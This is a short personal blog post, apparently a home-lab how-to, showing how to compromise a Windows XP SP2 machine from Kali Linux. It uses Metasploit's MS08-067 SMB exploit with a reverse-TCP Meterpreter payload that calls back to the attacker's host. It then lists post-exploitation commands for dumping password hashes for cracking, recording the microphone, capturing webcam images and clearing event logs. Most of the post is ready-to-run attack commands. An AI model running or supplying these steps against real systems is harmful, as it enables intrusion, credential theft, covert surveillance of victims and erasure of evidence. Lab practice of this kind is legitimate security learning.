SinjinSmith.Net

Random things that I have learned . . .

  • About

Using Kali Linux to Attack WinXP SP2

Posted by admin on December 13, 2014
Posted in: Linux OS, Metasploit, Security.

Windows XP SP 2 Setup:

Make sure Automatic Updates are disabled, the Windows Firewall is off, and the system has been restarted at least once.

Metasploit:

use exploit/windows/smb/ms08_067_netapi

set rhost 192.168.1.45

exploit #Do not execute at this point if you want to add the payload below

? or help #see the list of available meterpreter commands

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST <attacking_kali_host_ip>

set LPORT <local_port> #default port is 4444

You can verify the connection from the remote machine with the following command:

netstat -a | grep 4444 #4444 assumes default local port

Some interesting Meterpreter commands are:

hashdump #get password hashes to crack, crackstation.net
record_mic #record audio
webcam_list #list available webcams
web_snap #take a picture with the webcam
web_stream #stream video from webcam
sysinfo #get remote system information
shutdown #turn off remote computer
reboot #reboot remote computer
ps #list processes running on remote computer
kill #end process running on remote computer
execute –f <file> #start program on remote machine
clearev #clear the event log
upload #send file to remote system
download #retrieve file from remote system

Posts navigation

← Cracking WEP Encryption
Create Bootable USB Flash Drive →
  • Recent Posts

    • PowerShell TBA
    • Install OpenVAS on Kali Linux 2017.1
    • Updated Cable Modem Baseline
    • Cable Modem Baseline Stats
    • WPA2 Dictionary Attack
  • Recent Comments

    • Archives

      • October 2017
      • May 2017
      • March 2017
      • October 2016
      • March 2016
      • January 2016
      • June 2015
      • March 2015
      • February 2015
      • January 2015
      • December 2014
      • November 2014
      • October 2014
      • May 2014
      • September 2013
    • Categories

      • Linux OS
      • Metasploit
      • Microsoft Windows
      • Random Thoughts
      • Raspberry Pi
      • Rubber Ducky
      • Security
      • Uncategorized
    • Meta

      • Log in
      • Entries feed
      • Comments feed
      • WordPress.org
    Proudly powered by WordPress Theme: Parament by Automattic.